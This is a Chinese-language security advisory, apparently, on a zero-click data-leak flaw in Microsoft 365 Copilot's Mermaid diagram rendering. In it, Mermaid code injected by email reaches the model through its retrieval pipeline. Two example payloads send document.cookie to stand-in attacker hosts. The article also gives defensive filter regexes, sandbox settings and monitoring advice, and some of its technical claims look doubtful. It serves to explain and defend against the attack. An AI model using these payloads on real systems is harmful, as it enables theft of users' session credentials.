Microsoft 365 Copilot 近期曝出的 Mermaid 图表渲染漏洞揭示了新型数据外泄路径。当 Copilot 解析用户提交的 Mermaid 代码时,若未严格过滤 SVG 标签中的<image>元素,攻击者可构造特殊图表触发浏览器向外部服务器发送请求,实现敏感数据的无交互窃取。这种攻击不依赖用户点击,仅需将恶意代码嵌入邮件或文档即可激活,与 CVE-2025-54132 漏洞原理高度相似。
漏洞核心机制
Mermaid 作为流程图渲染库,允许在图表中嵌入外部图像。攻击者利用<img src="https://attacker.com/leak?data=${encodeURIComponent(document.cookie)}">语法构造 SVG payload,当 Copilot 渲染该图表时,浏览器会自动发起带敏感数据的 GET 请求。关键在于:
- 零点击触发:无需用户交互,渲染即触发外泄
- 上下文窃取:通过
document.cookie或localStorage获取会话凭证 - 隐蔽性:图表显示正常,仅网络请求暴露异常
实际攻击链包含三个关键阶段:首先通过邮件注入恶意 Mermaid 代码(如graph LR; A["<img src='https://exfil.example?c='+btoa(document.cookie)>"]),其次利用 Copilot 的 RAG 系统自动解析内容,最后通过浏览器同源策略绕过限制完成数据外泄。与传统 XSS 不同,该漏洞利用的是 AI 系统的渲染管道缺陷,安全团队常忽视此类攻击面。
企业防御参数清单
针对此类漏洞,需实施四层防护策略:
1. 输入过滤规则
- 禁止 Mermaid 代码中的
<image>、<foreignObject>等 SVG 嵌套标签 - 设置白名单:仅允许
graph、subgraph等基础语法 - 配置正则过滤:
/(<img|<svg|<script|data:)/i
2. 渲染沙箱强化
# Copilot渲染服务配置示例
mermaid:
security:
disableSVGTag: true
maxNodes: 50
allowedDomains: ["microsoftusercontent.com"]
timeout: 300ms
3. 网络行为监控
- 拦截非常规域名请求(如非
*.microsoft.com的外联) - 设置阈值告警:单次渲染触发 > 3 个外部请求
- 记录完整请求链路:包含原始输入内容哈希值
4. 应急响应流程
- 立即隔离受影响租户的 RAG 服务实例
- 回滚至 v1.2.7 以下版本(若未应用安全补丁)
- 执行数据泄露影响评估:检查过去 7 天所有 Mermaid 渲染日志
验证测试要点
企业安全团队应定期执行以下验证:
- 使用
mermaid-inject-test工具生成检测 payload - 检查响应头是否包含
Content-Security-Policy: img-src 'self' - 验证渲染服务是否返回
HTTP 403拒绝非法资源请求
值得注意的是,微软已在 2025 年 7 月通过服务端更新修复同类漏洞(参考 Cursor CVE-2025-54132 案例),但企业自定义 Copilot 插件仍存在风险。建议将 Mermaid 渲染服务与主应用隔离部署,采用单向网络策略限制外联权限。
长期防护建议
- 实施 AI 内容安全网关:在 RAG 系统前部署检测层
- 启用运行时内存监控:捕获非常规 DOM 操作
- 建立第三方库漏洞响应机制:对 Mermaid 等依赖库设置自动告警
随着 AI 应用深度集成业务系统,传统安全边界正在瓦解。本次漏洞警示我们:必须将渲染引擎纳入攻击面管理,通过参数化防护策略构建纵深防御。企业应立即审查所有 AI 产品的第三方库使用情况,避免因微小渲染缺陷导致核心数据泄露。安全团队需重点关注无交互式攻击(Zero-Click Exploit)的新变种,持续优化检测规则库以应对快速演化的威胁模型。
参考资料:Cursor 安全团队披露的 CVE-2025-54132 漏洞分析(CN-SEC)、微软安全公告 CVE-2025-32711